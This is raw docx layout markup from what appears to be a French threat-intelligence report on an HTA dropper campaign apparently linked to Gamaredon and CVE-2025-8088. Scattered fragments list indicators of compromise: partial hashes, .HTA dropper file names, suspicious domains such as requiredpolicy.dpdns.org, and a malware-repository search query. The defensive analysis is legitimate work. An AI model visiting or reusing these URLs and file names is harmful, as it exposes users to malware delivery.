            <wp:docPr id="6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MouUrl-15-06/latch/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99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3994415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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fd7e45e04aedb2f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099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4082680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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F.Creater_2_19_2-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20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4170945</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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c0bec2046a5df9b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4170945</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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appear5182.tiff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406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4259210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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1825_15.06.2026.HTA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50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4347475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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5fba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61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4701805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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c75edc187b47d53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713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4790070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2_17_7-1582_11.06.2026/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816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4790070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">https://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91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4878335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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ef7329f44cd025f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020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4966600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1232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4966600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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requiredpolicy.dpdns.org/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22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5054865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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fd1691718b65c67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5143130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F.Creater_2_17_7-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430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5143130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ProbUrl-11-06/books/caesar/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53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5231395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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db7efa67a32e7c4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6352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5319660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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doorway17709.ani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737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5319660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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1582_11.06.2026.HTA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84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5407925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6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9d14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94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5762255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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e1c5ab143114417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044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5850520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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1_18_9-1404_15.06.2026/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14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5938785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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e7e9b3c4a976b86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496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5938785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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https://getzone.qzz.io/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6027050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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54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6115315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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DbRUrlGoogle-15-06/lobby/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5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6115315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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15258d1669e95b8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59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6203580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F.Creater_1_18_9-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6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6291845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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fc1c7116d225e2e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64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6291845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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squadron9593.mid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664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6380110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1404_15.06.2026.HTA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6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6468375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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bed1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7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6822705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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309260f7776bf28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736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6910970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5_13_6-1838_15.06.2026/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0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6999235</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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https://getdata.dpdns.org/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7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6999235</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9326ff673ed1f44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808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7087500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ScanDocuments_version.PD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832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7175765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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SSUrlGoogle-15-06/little/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8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7175765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1ac9c8ffc56eba6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880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7264030</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339373" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F.Creater_5_13_6-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904" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4174489</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7352295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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row32096.jpc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9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7352295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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a7f27f25b21ab9e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952" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2212340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7440560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1838_15.06.2026.HTA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9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7528825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9270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8129293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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En parallèle, plusieurs échantillons ont été récupérés depuis MalwareBazaar à partir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8300943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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tag: CVE-2025-8088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. Cette recherche a notamment mis en évidence une forte activité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8477473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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l'utilisateur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5160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, responsable du dépôt d'un nombre important d'échantillons associés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8655708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1068499" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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84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cette campagne.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8930663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Afin d'identifier les fichiers explicitement reliés à la règle Nextron et soumis en 2026,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9104018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1968586" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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85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requête suivante a été utilisée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9366755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5796682" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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68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4"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">entity:file comment:"mal_apt_gamaredon_hta_dropper_dec25" fs:2026-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9536935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="538933" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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93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01-01+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21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7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21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7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7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26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7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28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3731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161289"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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61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6128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38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1266199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5752464" cy="696595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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2464" cy="696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2464" h="696595">
                          <a:moveTo>
                            <a:pt x="4705349" y="696595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5752464" y="696595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5752464" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705349" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705349" y="696595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="696595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4704715" y="696595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4704715" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="696595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="696595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="696595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69659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84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1963429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="6815455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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68154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6815455">
                          <a:moveTo>
                            <a:pt x="0" y="5838825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5838825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6815455"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6815455"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5838825"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="5832475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="5832475"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="5832475"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="5832475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="5832475"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="5832475"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="5832475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="5832475"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5832475"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="4595495"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="4595495"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="4595495"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="4595495"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="4595495"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="4595495"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="4595495"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="4595495"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4595495"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="3711575"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="3711575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="3711575"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="3711575"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="3711575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="3711575"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="3711575"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="3711575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3711575"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="2827655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="2827655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="2827655"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="2827655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="2827655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="2827655"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2827655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="2827655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2827655"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="1767205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="1767205"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="1767205"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="1767205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="1767205"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="1767205"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1767205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="1767205"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1767205"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635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29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8893819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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523874">
                          <a:moveTo>
                            <a:pt x="2190750" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="52387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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="52387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332865" y="523874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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2233930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9418329</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="856615" cy="239395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6615" cy="239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6615" h="239395">
                          <a:moveTo>
                            <a:pt x="0" y="239395"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="856615" y="239395"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="856615" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="23939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70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161289"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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61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6128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00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1266199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5752464" cy="696595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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2464" cy="696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2464" h="696595">
                          <a:moveTo>
                            <a:pt x="4705349" y="696595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5752464" y="696595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5752464" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705349" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705349" y="696595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="696595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4704715" y="696595"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4704715" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="696595"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="696595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1332865" y="696595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69659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953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1963429</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="6815455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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68154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6815455">
                          <a:moveTo>
                            <a:pt x="0" y="5838825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5838825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6815455"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6815455"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5838825"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="5832475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="5832475"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="5832475"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="5832475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="5832475"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="5832475"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="5832475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="5832475"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4596130"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="5832475"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="4595495"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="4595495"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="4595495"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="4595495"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="4595495"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="4595495"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="4595495"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="4595495"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3712210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="4595495"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="3711575"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="3711575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="3711575"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="3711575"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="3711575"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="3711575"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="3711575"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="3711575"/>
                          </a:lnTo>
                          <a:lnTo>
